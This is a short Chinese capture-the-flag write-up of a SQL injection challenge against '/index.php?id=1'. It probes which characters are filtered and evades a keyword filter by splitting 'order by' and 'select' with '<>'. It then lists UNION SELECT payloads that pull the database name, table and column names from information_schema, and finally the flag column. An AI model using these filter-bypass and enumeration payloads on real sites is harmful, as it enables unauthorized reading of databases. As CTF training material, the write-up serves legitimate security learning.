题目内容:
出题人就告诉你这是个注入,有种别走!
看 URL
/index.php?id=1
测过滤
没有过滤: ' 空格 #
被过滤: order by,select
测能否绕过
/**/
1 ord/**/er by 3%23
<>
1 ord<>er by 3%23 有回显
1 ord<>er by 4%23 无回显
?id=-1 union sel<>ect 1,2,3%23
?id=-1 union sel<>ect 1,database(),3%23
?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23
?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23
?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23